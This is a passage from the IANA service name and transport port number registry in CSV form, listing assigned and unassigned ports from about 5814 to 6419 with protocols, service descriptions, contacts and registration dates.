Automation,[Joshua_Hawkins],[Joshua_Hawkins],2003-11,,,,, spt-automation,5814,udp,Support Automation,[Joshua_Hawkins],[Joshua_Hawkins],2003-11,,,,, ,5815-5841,,Unassigned,,,,,,,, reversion,5842,tcp,Reversion Backup/Restore,[Cameo_Systems_Inc],[Craig_Nelson],2011-09-26,,,,, ,5842,udp,Reserved,,,,,,,, ,5843-5858,,Unassigned,,,,,,,, wherehoo,5859,tcp,WHEREHOO,[Jim_Youll],[Jim_Youll],,,,,, wherehoo,5859,udp,WHEREHOO,[Jim_Youll],[Jim_Youll],,,,,, ,5860-5862,,Unassigned,,,,,,,, ppsuitemsg,5863,tcp,PlanetPress Suite Messeng,[Yannick_Fortin],[Yannick_Fortin],2006-02,,,,, ppsuitemsg,5863,udp,PlanetPress Suite Messeng,[Yannick_Fortin],[Yannick_Fortin],2006-02,,,,, ,5864-5867,,Unassigned,,,,,,,, diameters,5868,tcp,Diameter over TLS/TCP,[IESG],[IETF_Chair],,,[RFC6733],,, ,5868,udp,Reserved,,,,,,,, diameters,5868,sctp,Diameter over DTLS/SCTP,[IESG],[IETF_Chair],,,[RFC6733],,, ,5869-5882,,Unassigned,,,,,,,, jute,5883,tcp,Javascript Unit Test Environment,[Mark_Ethan_Trostler],[Mark_Ethan_Trostler],2011-11-23,,,,, ,5884-5899,,Unassigned,,,,,,,, rfb,5900,tcp,Remote Framebuffer,[Tristan_Richardson],[Tristan_Richardson],2006-03,,[RFC6143],,, rfb,5900,udp,Remote Framebuffer,[Tristan_Richardson],[Tristan_Richardson],2006-03,,[RFC6143],,, ,5901-5909,,Unassigned,,,,,,,, cm,5910,tcp,Context Management,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, cm,5910,udp,Context Management,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, cm,5910,sctp,Context Management,[Justin_Yu],[Justin_Yu],2011-05-19,,,,, cpdlc,5911,tcp,Controller Pilot Data Link Communication,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, cpdlc,5911,udp,Controller Pilot Data Link Communication,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, cpdlc,5911,sctp,Controller Pilot Data Link Communication,[Justin_Yu],[Justin_Yu],2011-05-18,,,,, fis,5912,tcp,Flight Information Services,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, fis,5912,udp,Flight Information Services,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, fis,5912,sctp,Flight Information Services,[Justin_Yu],[Justin_Yu],2011-05-25,,,,, ads-c,5913,tcp,Automatic Dependent Surveillance,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, ads-c,5913,udp,Automatic Dependent Surveillance,[Eivan_Cerasi],[Eivan_Cerasi],2008-10-10,,,,, ads-c,5913,sctp,Automatic Dependent Surveillance,[Justin_Yu],[Justin_Yu],2011-05-25,,,,, ,5914-5962,,Unassigned,,,,,,,, indy,5963,tcp,Indy Application Server,[Bjorn_Lantz],[Bjorn_Lantz],2004-11,,,,, indy,5963,udp,Indy Application Server,[Bjorn_Lantz],[Bjorn_Lantz],2004-11,,,,, ,5964-5967,,Unassigned,,,,,,,, mppolicy-v5,5968,tcp,mppolicy-v5,[Yutaka_Ono],[Yutaka_Ono],,,,,, mppolicy-v5,5968,udp,mppolicy-v5,[Yutaka_Ono],[Yutaka_Ono],,,,,, mppolicy-mgr,5969,tcp,mppolicy-mgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, mppolicy-mgr,5969,udp,mppolicy-mgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,5970-5983,,Unassigned,,,,,,,, couchdb,5984,tcp,CouchDB,[Noah_Slater],[Noah_Slater],2007-11-27,,,,, couchdb,5984,udp,CouchDB,[Noah_Slater],[Noah_Slater],2007-11-27,,,,, wsman,5985,tcp,WBEM WS-Management HTTP,[Jim_Davis],[Jim_Davis],2006-11,,,,, wsman,5985,udp,WBEM WS-Management HTTP,[Jim_Davis],[Jim_Davis],2006-11,,,,, wsmans,5986,tcp,WBEM WS-Management HTTP over TLS/SSL,[Jim_Davis],[Jim_Davis],2006-11,,,,, wsmans,5986,udp,WBEM WS-Management HTTP over TLS/SSL,[Jim_Davis],[Jim_Davis],2006-11,,,,, wbem-rmi,5987,tcp,WBEM RMI,[Jim_Davis],[Jim_Davis],,,,,, wbem-rmi,5987,udp,WBEM RMI,[Jim_Davis],[Jim_Davis],,,,,, wbem-http,5988,tcp,WBEM CIM-XML (HTTP),[Jim_Davis],[Jim_Davis],,,,,, wbem-http,5988,udp,WBEM CIM-XML (HTTP),[Jim_Davis],[Jim_Davis],,,,,, wbem-https,5989,tcp,WBEM CIM-XML (HTTPS),[Jim_Davis],[Jim_Davis],,,,,, wbem-https,5989,udp,WBEM CIM-XML (HTTPS),[Jim_Davis],[Jim_Davis],,,,,, wbem-exp-https,5990,tcp,WBEM Export HTTPS,[Denise_Eckstein],[Denise_Eckstein],2004-11,,,,, wbem-exp-https,5990,udp,WBEM Export HTTPS,[Denise_Eckstein],[Denise_Eckstein],2004-11,,,,, nuxsl,5991,tcp,NUXSL,[Kai_Kretschmann],[Kai_Kretschmann],2002-03,,,,, nuxsl,5991,udp,NUXSL,[Kai_Kretschmann],[Kai_Kretschmann],2002-03,,,,, consul-insight,5992,tcp,Consul InSight Security,[Arthur_Hillenaar],[Arthur_Hillenaar],2006-01,,,,, consul-insight,5992,udp,Consul InSight Security,[Arthur_Hillenaar],[Arthur_Hillenaar],2006-01,,,,, ,5993-5998,,Unassigned,,,,,,,, cvsup,5999,tcp,CVSup,[Randall_Atkinson_2],[Randall_Atkinson_2],,,,,, cvsup,5999,udp,CVSup,[Randall_Atkinson_2],[Randall_Atkinson_2],,,,,, x11,6000-6063,tcp,X Window System,[Stephen_Gildea],[Stephen_Gildea],,,,,Known Unauthorized Use on port 6003, x11,6000-6063,udp,X Window System,[Stephen_Gildea],[Stephen_Gildea],,,,,Known Unauthorized Use on port 6003, ndl-ahp-svc,6064,tcp,NDL-AHP-SVC,[John_Richmond_2],[John_Richmond_2],,,,,, ndl-ahp-svc,6064,udp,NDL-AHP-SVC,[John_Richmond_2],[John_Richmond_2],,,,,, winpharaoh,6065,tcp,WinPharaoh,[Basil_Lee],[Basil_Lee],,,,,, winpharaoh,6065,udp,WinPharaoh,[Basil_Lee],[Basil_Lee],,,,,, ewctsp,6066,tcp,EWCTSP,[Mark_Bailon],[Mark_Bailon],,,,,, ewctsp,6066,udp,EWCTSP,[Mark_Bailon],[Mark_Bailon],,,,,, ,6067,,Unassigned,,,,2007-07-17,,,, gsmp-ancp,6068,tcp,GSMP/ANCP,[Avri_Doria],[Avri_Doria],,,[RFC6320],,, ,6068,udp,Reserved,,,,,,,, trip,6069,tcp,TRIP,[Hussein_F_Salama],[Hussein_F_Salama],,,,,, trip,6069,udp,TRIP,[Hussein_F_Salama],[Hussein_F_Salama],,,,,, messageasap,6070,tcp,Messageasap,[Murray_Freeman],[Murray_Freeman],,,,,, messageasap,6070,udp,Messageasap,[Murray_Freeman],[Murray_Freeman],,,,,, ssdtp,6071,tcp,SSDTP,[Michael_Shearson_2],[Michael_Shearson_2],,,,,, ssdtp,6071,udp,SSDTP,[Michael_Shearson_2],[Michael_Shearson_2],,,,,, diagnose-proc,6072,tcp,DIAGNOSE-PROC,[Allan_Miller],[Allan_Miller],,,,,, diagnose-proc,6072,udp,DIAGNOSE-PROC,[Allan_Miller],[Allan_Miller],,,,,, directplay8,6073,tcp,DirectPlay8,[John_Kane],[John_Kane],,,,,, directplay8,6073,udp,DirectPlay8,[John_Kane],[John_Kane],,,,,, max,6074,tcp,Microsoft Max,[Jay_Beavers],[Jay_Beavers],2006-02,,,,, max,6074,udp,Microsoft Max,[Jay_Beavers],[Jay_Beavers],2006-02,,,,, dpm-acm,6075,tcp,Microsoft DPM Access Control Manager,[Prabu_Ambravaneswara],[Prabu_Ambravaneswara],2009-10-29,,,,, ,6075,udp,Reserved,,,,,,,, msft-dpm-cert,6076,tcp,Microsoft DPM WCF Certificates,[Microsoft_Corporation],[Prateek_Sharma],2011-08-04,,,,, ,6076,udp,Reserved,,,,,,,, iconstructsrv,6077,tcp,iConstruct Server,[iConstruct_Aus_Pty_Ltd],[Afshin_Jafari],2012-12-21,,,,, ,6077,udp,Reserved,,,,,,,, ,6078-6080,,Unassigned,,,,,,,, geneve,6081,udp,Generic Network Virtualization Encapsulation (Geneve),[Jesse_Gross],[Jesse_Gross],2014-03-27,,[draft-gross-geneve-00],,, ,6081,tcp,Reserved,,,,,,,, ,6082,tcp,Reserved,,,,,,,, p25cai,6082,udp,APCO Project 25 Common Air Interface - UDP encapsulation,[APCO_Project],[APCO_Project],2011-05-13,,,,, ,6083,tcp,Reserved,,,,,,,, miami-bcast,6083,udp,telecomsoftware miami broadcast,[Peter_Steiner],[Peter_Steiner],2011-02-22,,,,, reload-config,6084,tcp,Peer to Peer Infrastructure Configuration,[IESG],[IETF_Chair],2009-01-29,2013-03-26,[RFC6940],,, ,6084,udp,Reserved,,,,,,,, konspire2b,6085,tcp,konspire2b p2p network,[Jason_Rohrer],[Jason_Rohrer],2002-10,,,,, konspire2b,6085,udp,konspire2b p2p network,[Jason_Rohrer],[Jason_Rohrer],2002-10,,,,, pdtp,6086,tcp,PDTP P2P,[Tony_Arcieri],[Tony_Arcieri],2006-03,,,,, pdtp,6086,udp,PDTP P2P,[Tony_Arcieri],[Tony_Arcieri],2006-03,,,,, ldss,6087,tcp,Local Download Sharing Service,[Clifford_Heath],[Clifford_Heath],2006-05,,,,, ldss,6087,udp,Local Download Sharing Service,[Clifford_Heath],[Clifford_Heath],2006-05,,,,, doglms,6088,tcp,SuperDog License Manager,[SafeNet],[Rob_Tao],2012-07-26,,,,, doglms-notify,6088,udp,SuperDog License Manager Notifier,[SafeNet],[Rob_Tao],2012-07-26,,,,, ,6089-6098,,Unassigned,,,,,,,, raxa-mgmt,6099,tcp,RAXA Management,[Sukanta_Ganguly],[Sukanta_Ganguly],,,,,, ,6099,udp,Reserved,,,,,,,, synchronet-db,6100,tcp,SynchroNet-db,[Arne_Haugland],[Arne_Haugland],,,,,Known Unauthorized Use on port 6100, synchronet-db,6100,udp,SynchroNet-db,[Arne_Haugland],[Arne_Haugland],,,,,Known Unauthorized Use on port 6100, synchronet-rtc,6101,tcp,SynchroNet-rtc,[Arne_Haugland],[Arne_Haugland],,,,,, synchronet-rtc,6101,udp,SynchroNet-rtc,[Arne_Haugland],[Arne_Haugland],,,,,, synchronet-upd,6102,tcp,SynchroNet-upd,[Arne_Haugland],[Arne_Haugland],,,,,, synchronet-upd,6102,udp,SynchroNet-upd,[Arne_Haugland],[Arne_Haugland],,,,,, rets,6103,tcp,RETS,[Bruce_Toback],[Bruce_Toback],,,,,, rets,6103,udp,RETS,[Bruce_Toback],[Bruce_Toback],,,,,, dbdb,6104,tcp,DBDB,[Aaron_Brick],[Aaron_Brick],,,,,, dbdb,6104,udp,DBDB,[Aaron_Brick],[Aaron_Brick],,,,,, primaserver,6105,tcp,Prima Server,[Prima_Designs_System],[Prima_Designs_System],,,,,, primaserver,6105,udp,Prima Server,[Prima_Designs_System],[Prima_Designs_System],,,,,, mpsserver,6106,tcp,MPS Server,[Prima_Designs_System],[Prima_Designs_System],,,,,, mpsserver,6106,udp,MPS Server,[Prima_Designs_System],[Prima_Designs_System],,,,,, etc-control,6107,tcp,ETC Control,[Steve_Polishinski],[Steve_Polishinski],,,,,, etc-control,6107,udp,ETC Control,[Steve_Polishinski],[Steve_Polishinski],,,,,, sercomm-scadmin,6108,tcp,Sercomm-SCAdmin,[Melinda_Tsao_2],[Melinda_Tsao_2],,,,,, sercomm-scadmin,6108,udp,Sercomm-SCAdmin,[Melinda_Tsao_2],[Melinda_Tsao_2],,,,,, globecast-id,6109,tcp,GLOBECAST-ID,[Piers_Scannell_2],[Piers_Scannell_2],,,,,, globecast-id,6109,udp,GLOBECAST-ID,[Piers_Scannell_2],[Piers_Scannell_2],,,,,, softcm,6110,tcp,HP SoftBench CM,[Scott_A_Kramer],[Scott_A_Kramer],,,,,, softcm,6110,udp,HP SoftBench CM,[Scott_A_Kramer],[Scott_A_Kramer],,,,,, spc,6111,tcp,HP SoftBench Sub-Process Control,[Scott_A_Kramer],[Scott_A_Kramer],,,,,, spc,6111,udp,HP SoftBench Sub-Process Control,[Scott_A_Kramer],[Scott_A_Kramer],,,,,, dtspcd,6112,tcp,Desk-Top Sub-Process Control Daemon,[Doug_Royer],[Doug_Royer],2010-12-08,,,,, dtspcd,6112,udp,Desk-Top Sub-Process Control Daemon,[Doug_Royer],[Doug_Royer],2010-12-08,,,,, dayliteserver,6113,tcp,Daylite Server,[Brent_Gulanowski],[Brent_Gulanowski],2009-08-26,,,,, ,6113,udp,Reserved,,,,,,,, wrspice,6114,tcp,WRspice IPC Service,[Stephen_R_Whiteley],[Stephen_R_Whiteley],2010-10-07,,,,, ,6114,udp,Reserved,,,,,,,, xic,6115,tcp,Xic IPC Service,[Stephen_R_Whiteley],[Stephen_R_Whiteley],2010-10-07,,,,, ,6115,udp,Reserved,,,,,,,, xtlserv,6116,tcp,XicTools License Manager Service,[Stephen_R_Whiteley],[Stephen_R_Whiteley],2010-10-07,,,,, ,6116,udp,Reserved,,,,,,,, daylitetouch,6117,tcp,Daylite Touch Sync,[Brent_Gulanowski],[Brent_Gulanowski],2009-08-26,,,,, ,6117,udp,Reserved,,,,,,,, tipc,6118,udp,Transparent Inter Process Communication,[Ericsson],[Erik_Hugne],2012-09-05,,,,, ,6118,tcp,Reserved,,,,,,,, ,6119-6120,,Unassigned,,,,,,,, spdy,6121,tcp,SPDY for a faster web,[Matthew_Lloyd],[Matthew_Lloyd],2010-04-26,,,,, ,6121,udp,Reserved,,,,,,,, bex-webadmin,6122,tcp,Backup Express Web Server,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, bex-webadmin,6122,udp,Backup Express Web Server,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, backup-express,6123,tcp,Backup Express,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, backup-express,6123,udp,Backup Express,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, pnbs,6124,tcp,Phlexible Network Backup Service,[William_R_Lear_2],[William_R_Lear_2],2008-10-23,,,,, pnbs,6124,udp,Phlexible Network Backup Service,[William_R_Lear_2],[William_R_Lear_2],2008-10-23,,,,, ,6125-6129,,Unassigned,,,,,,,, damewaremobgtwy,6130,tcp,The DameWare Mobile Gateway Service,[SolarWinds],[David_Gayler],2013-05-29,,,,, ,6130,udp,Reserved,,,,,,,, ,6131-6132,,Unassigned,,,,,,,, nbt-wol,6133,tcp,New Boundary Tech WOL,[Elizabeth_Zilen],[Elizabeth_Zilen],2004-11,,,,, nbt-wol,6133,udp,New Boundary Tech WOL,[Elizabeth_Zilen],[Elizabeth_Zilen],2004-11,,,,, ,6134-6139,,Unassigned,,,,,,,, pulsonixnls,6140,tcp,Pulsonix Network License Service,[David_Manns],[David_Manns],2008-02-28,,,,, pulsonixnls,6140,udp,Pulsonix Network License Service,[David_Manns],[David_Manns],2008-02-28,,,,, meta-corp,6141,tcp,Meta Corporation License Manager,[Osamu_Masuda],[Osamu_Masuda],,,,,, meta-corp,6141,udp,Meta Corporation License Manager,[Osamu_Masuda],[Osamu_Masuda],,,,,, aspentec-lm,6142,tcp,Aspen Technology License Manager,[Kevin_Massey],[Kevin_Massey],,,,,, aspentec-lm,6142,udp,Aspen Technology License Manager,[Kevin_Massey],[Kevin_Massey],,,,,, watershed-lm,6143,tcp,Watershed License Manager,[David_Ferrero],[David_Ferrero],,,,,, watershed-lm,6143,udp,Watershed License Manager,[David_Ferrero],[David_Ferrero],,,,,, statsci1-lm,6144,tcp,StatSci License Manager - 1,[Scott_Blachowicz],[Scott_Blachowicz],,,,,, statsci1-lm,6144,udp,StatSci License Manager - 1,[Scott_Blachowicz],[Scott_Blachowicz],,,,,, statsci2-lm,6145,tcp,StatSci License Manager - 2,[Scott_Blachowicz],[Scott_Blachowicz],,,,,, statsci2-lm,6145,udp,StatSci License Manager - 2,[Scott_Blachowicz],[Scott_Blachowicz],,,,,, lonewolf-lm,6146,tcp,Lone Wolf Systems License Manager,[Dan_Klein],[Dan_Klein],,,,,, lonewolf-lm,6146,udp,Lone Wolf Systems License Manager,[Dan_Klein],[Dan_Klein],,,,,, montage-lm,6147,tcp,Montage License Manager,[Michael_Ubell],[Michael_Ubell],,,,,, montage-lm,6147,udp,Montage License Manager,[Michael_Ubell],[Michael_Ubell],,,,,, ricardo-lm,6148,tcp,Ricardo North America License Manager,[M_Flemming],[M_Flemming],,,,,, ricardo-lm,6148,udp,Ricardo North America License Manager,[M_Flemming],[M_Flemming],,,,,, tal-pod,6149,tcp,tal-pod,[Steven_Loomis],[Steven_Loomis],,,,,, tal-pod,6149,udp,tal-pod,[Steven_Loomis],[Steven_Loomis],,,,,, ,6150-6158,,Unassigned,,,,,,,, efb-aci,6159,tcp,EFB Application Control Interface,[Jonathan_Schaaf],[Jonathan_Schaaf],2010-02-10,,,,, ,6159,udp,Reserved,,,,,,,, ecmp,6160,tcp,Emerson Extensible Control and Management Protocol,[Bryce_Beeston],[Bryce_Beeston],2011-06-23,,,,, ecmp-data,6160,udp,Emerson Extensible Control and Management Protocol Data,[Bryce_Beeston],[Bryce_Beeston],2011-06-23,,,,, patrol-ism,6161,tcp,PATROL Internet Srv Mgr,[Portnoy_Boxman],[Portnoy_Boxman],2005-01,,,,, patrol-ism,6161,udp,PATROL Internet Srv Mgr,[Portnoy_Boxman],[Portnoy_Boxman],2005-01,,,,, patrol-coll,6162,tcp,PATROL Collector,[Portnoy_Boxman],[Portnoy_Boxman],2005-01,,,,, patrol-coll,6162,udp,PATROL Collector,[Portnoy_Boxman],[Portnoy_Boxman],2005-01,,,,, pscribe,6163,tcp,Precision Scribe Cnx Port,[Robert_W_Hodges],[Robert_W_Hodges],2005-01,,,,, pscribe,6163,udp,Precision Scribe Cnx Port,[Robert_W_Hodges],[Robert_W_Hodges],2005-01,,,,, ,6164-6199,,Unassigned,,,,,,,, lm-x,6200,tcp,LM-X License Manager by X-Formation,[Henrik_Goldman],[Henrik_Goldman],2006-10,,,,Known Unauthorized Use on port 6200, lm-x,6200,udp,LM-X License Manager by X-Formation,[Henrik_Goldman],[Henrik_Goldman],2006-10,,,,Known Unauthorized Use on port 6200, ,6201,tcp,Reserved,,,,,,,, thermo-calc,6201,udp,Management of service nodes in a processing grid for thermodynamic calculations,[Thermo-Calc_Software],[Thomas_Revesz],2012-06-28,,,,, ,6202-6221,,Unassigned,,,,,,,, radmind,6222,tcp,Radmind Access Protocol,[Patrick_M_McNeal],[Patrick_M_McNeal],2006-03,,,,, radmind,6222,udp,Radmind Access Protocol,[Patrick_M_McNeal],[Patrick_M_McNeal],2006-03,,,,, ,6223-6240,,Unassigned,,,,,,,, jeol-nsdtp-1,6241,tcp,JEOL Network Services Data Transport Protocol 1,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsddp-1,6241,udp,JEOL Network Services Dynamic Discovery Protocol 1,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsdtp-2,6242,tcp,JEOL Network Services Data Transport Protocol 2,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsddp-2,6242,udp,JEOL Network Services Dynamic Discovery Protocol 2,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsdtp-3,6243,tcp,JEOL Network Services Data Transport Protocol 3,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsddp-3,6243,udp,JEOL Network Services Dynamic Discovery Protocol 3,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsdtp-4,6244,tcp,JEOL Network Services Data Transport Protocol 4,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, jeol-nsddp-4,6244,udp,JEOL Network Services Dynamic Discovery Protocol 4,[Kevin_Wellwood],[Kevin_Wellwood],2008-04-17,,,,, ,6245-6250,,Unassigned,,,,,,,, tl1-raw-ssl,6251,tcp,TL1 Raw Over SSL/TLS,[Jim_Humphreys],[Jim_Humphreys],2008-01-29,,,,, tl1-raw-ssl,6251,udp,TL1 Raw Over SSL/TLS,[Jim_Humphreys],[Jim_Humphreys],2008-01-29,,,,, tl1-ssh,6252,tcp,TL1 over SSH,[Jim_Humphreys],[Jim_Humphreys],2008-01-25,,,,, tl1-ssh,6252,udp,TL1 over SSH,[Jim_Humphreys],[Jim_Humphreys],2008-01-25,,,,, crip,6253,tcp,CRIP,[Mike_Rodbell],[Mike_Rodbell],,,,,, crip,6253,udp,CRIP,[Mike_Rodbell],[Mike_Rodbell],,,,,, ,6254-6266,,Unassigned,,,,,,,, gld,6267,tcp,GridLAB-D User Interface,[David_Chassin],[David_Chassin],2010-12-10,,,,, ,6267,udp,Reserved,,,,,,,, grid,6268,tcp,Grid Authentication,[Jason_Hamilton],[Jason_Hamilton],2006-06,,,,, grid,6268,udp,Grid Authentication,[Jason_Hamilton],[Jason_Hamilton],2006-06,,,,, grid-alt,6269,tcp,Grid Authentication Alt,[Jason_Hamilton],[Jason_Hamilton],2006-06,,,,, grid-alt,6269,udp,Grid Authentication Alt,[Jason_Hamilton],[Jason_Hamilton],2006-06,,,,, ,6270-6299,,Unassigned,,,,,,,, bmc-grx,6300,tcp,BMC GRX,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-grx,6300,udp,BMC GRX,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-ctd-ldap,6301,tcp,"BMC CONTROL-D LDAP SERVER IANA assigned this well-formed service name as a replacement for ""bmc_ctd_ldap"".",[Portnoy_Boxman_2],[Portnoy_Boxman_2],2006-09,,,,, bmc_ctd_ldap,6301,tcp,BMC CONTROL-D LDAP SERVER,[Portnoy_Boxman_2],[Portnoy_Boxman_2],2006-09,,,,,"This entry is an alias to ""bmc-ctd-ldap"". This entry is now historic, not usable for use with many common service discovery mechanisms." bmc-ctd-ldap,6301,udp,"BMC CONTROL-D LDAP SERVER IANA assigned this well-formed service name as a replacement for ""bmc_ctd_ldap"".",[Portnoy_Boxman_2],[Portnoy_Boxman_2],2006-09,,,,, bmc_ctd_ldap,6301,udp,BMC CONTROL-D LDAP SERVER,[Portnoy_Boxman_2],[Portnoy_Boxman_2],2006-09,,,,,"This entry is an alias to ""bmc-ctd-ldap"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,6302-6305,,Unassigned,,,,,,,, ufmp,6306,tcp,Unified Fabric Management Protocol,[Albert_Berlovitch],[Albert_Berlovitch],2009-12-17,,,,, ufmp,6306,udp,Unified Fabric Management Protocol,[Albert_Berlovitch],[Albert_Berlovitch],2009-12-17,,,,, ,6307-6314,,Unassigned,,,,,,,, scup,6315,tcp,Sensor Control Unit Protocol,[Sven_Kopacz],[Sven_Kopacz],2010-09-01,,,,, scup-disc,6315,udp,Sensor Control Unit Protocol Discovery Protocol,[Sven_Kopacz],[Sven_Kopacz],2010-09-01,,,,, abb-escp,6316,tcp,Ethernet Sensor Communications Protocol,[Jaime_Antolin],[Jaime_Antolin],2008-09-25,,,,, abb-escp,6316,udp,Ethernet Sensor Communications Protocol,[Jaime_Antolin],[Jaime_Antolin],2008-09-25,,,,, nav-data-cmd,6317,tcp,Navtech Radar Sensor Data Command,[Navtech_Radar_Ltd],[Guy_Avery],2013-02-20,,,,, nav-data,6317,udp,Navtech Radar Sensor Data,[Navtech_Radar_Ltd],[Guy_Avery],2013-02-20,,,,, ,6318-6319,,Unassigned,,,,,,,, repsvc,6320,tcp,Double-Take Replication Service,[James_Wilkinson],[James_Wilkinson],2006-04,,,,, repsvc,6320,udp,Double-Take Replication Service,[James_Wilkinson],[James_Wilkinson],2006-04,,,,, emp-server1,6321,tcp,Empress Software Connectivity Server 1,[Srdjan_Holovac],[Srdjan_Holovac],,,,,, emp-server1,6321,udp,Empress Software Connectivity Server 1,[Srdjan_Holovac],[Srdjan_Holovac],,,,,, emp-server2,6322,tcp,Empress Software Connectivity Server 2,[Srdjan_Holovac],[Srdjan_Holovac],,,,,, emp-server2,6322,udp,Empress Software Connectivity Server 2,[Srdjan_Holovac],[Srdjan_Holovac],,,,,, ,6323,,Unassigned,,,,,,,, hrd-ncs,6324,tcp,HR Device Network Configuration Service,[Hall_Research],[Vishal_Dharmadhikari],2011-11-29,,,,, hrd-ns-disc,6324,udp,HR Device Network service,[Hall_Research],[Vishal_Dharmadhikari],2011-11-29,,,,, dt-mgmtsvc,6325,tcp,Double-Take Management Service,[Vision_Solutions],[James_Wilkinson2],2012-06-06,,,,, ,6325,udp,Reserved,,,,,,,, dt-vra,6326,tcp,Double-Take Virtual Recovery Assistant,[Vision_Solutions],[James_Wilkinson2],2012-10-08,,,,, ,6326,udp,Reserved,,,,,,,, ,6327-6342,,Unassigned,,,,,,,, sflow,6343,tcp,sFlow traffic monitoring,[Peter_Phaal],[Peter_Phaal],2003-06,,,,, sflow,6343,udp,sFlow traffic monitoring,[Peter_Phaal],[Peter_Phaal],2003-06,,,,, streletz,6344,tcp,Argus-Spectr security and fire-prevention systems service,[Argus_Spectr],[Kirill_Marinushkin],2013-10-25,,,,, ,6344,udp,Reserved,,,,,,,, ,6345-6345,,Unassigned,,,,,,,, gnutella-svc,6346,tcp,gnutella-svc,[Serguei_Osokine],[Serguei_Osokine],,,,,, gnutella-svc,6346,udp,gnutella-svc,[Serguei_Osokine],[Serguei_Osokine],,,,,, gnutella-rtr,6347,tcp,gnutella-rtr,[Serguei_Osokine],[Serguei_Osokine],,,,,, gnutella-rtr,6347,udp,gnutella-rtr,[Serguei_Osokine],[Serguei_Osokine],,,,,, ,6348-6349,,Unassigned,,,,,,,, adap,6350,tcp,App Discovery and Access Protocol,[Thomas_Kjoernes],[Thomas_Kjoernes],2010-06-22,,,,, adap,6350,udp,App Discovery and Access Protocol,[Thomas_Kjoernes],[Thomas_Kjoernes],2010-06-22,,,,, ,6351-6354,,Unassigned,,,,,,,, pmcs,6355,tcp,PMCS applications,[Pavel_Mendl],[Pavel_Mendl],2007-03,,,,, pmcs,6355,udp,PMCS applications,[Pavel_Mendl],[Pavel_Mendl],2007-03,,,,, ,6356-6359,,Unassigned,,,,,,,, metaedit-mu,6360,tcp,MetaEdit+ Multi-User,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, metaedit-mu,6360,udp,MetaEdit+ Multi-User,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, ,6361-6362,,Unassigned,,,,,,,, ndn,6363,udp,Named Data Networking,[Regents_of_the_University_of_California],[Jeff_Burke],2013-10-30,,,,, ,6363,tcp,Reserved,,,,,,,, ,6364-6369,,Unassigned,,,,,,,, metaedit-se,6370,tcp,MetaEdit+ Server Administration,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, metaedit-se,6370,udp,MetaEdit+ Server Administration,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, ,6371-6381,,Unassigned,,,,,,,, metatude-mds,6382,tcp,Metatude Dialogue Server,[Menno_Zweistra],[Menno_Zweistra],,,,,, metatude-mds,6382,udp,Metatude Dialogue Server,[Menno_Zweistra],[Menno_Zweistra],,,,,, ,6383-6388,,Unassigned,,,,,,,, clariion-evr01,6389,tcp,clariion-evr01,[Dave_DesRoches],[Dave_DesRoches],,,,,, clariion-evr01,6389,udp,clariion-evr01,[Dave_DesRoches],[Dave_DesRoches],,,,,, metaedit-ws,6390,tcp,MetaEdit+ WebService API,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, metaedit-ws,6390,udp,MetaEdit+ WebService API,[Steven_Kelly],[Steven_Kelly],2007-11-12,,,,, ,6391-6399,,Unassigned,,,,,,,, boe-cms,6400,,Business Objects CMS contact port,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-was,6401,,boe-was,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-eventsrv,6402,,boe-eventsrv,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-cachesvr,6403,,boe-cachesvr,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-filesvr,6404,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-pagesvr,6405,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-processsvr,6406,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-resssvr1,6407,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-resssvr2,6408,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-resssvr3,6409,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, boe-resssvr4,6410,,Business Objects Enterprise internal server,[Wade_Richards],[Wade_Richards],2008-05-05,,,,, ,6411-6416,,Unassigned,,,,,,,, faxcomservice,6417,tcp,Faxcom Message Service,[Albert_Leung],[Albert_Leung],2006-04,,,,, faxcomservice,6417,udp,Faxcom Message Service,[Albert_Leung],[Albert_Leung],2006-04,,,,, syserverremote,6418,tcp,SYserver remote commands,[David_Ashkenazi],[David_Ashkenazi],2010-03-23,,,,, ,6418,udp,Reserved,,,,,,,, svdrp,6419,tcp,Simple VDR Protocol,[Klaus_Schmidinger],[Klaus_Schmidinger],2010-03-31,,,,, ,6419,udp,Reserved,,,,,,,, 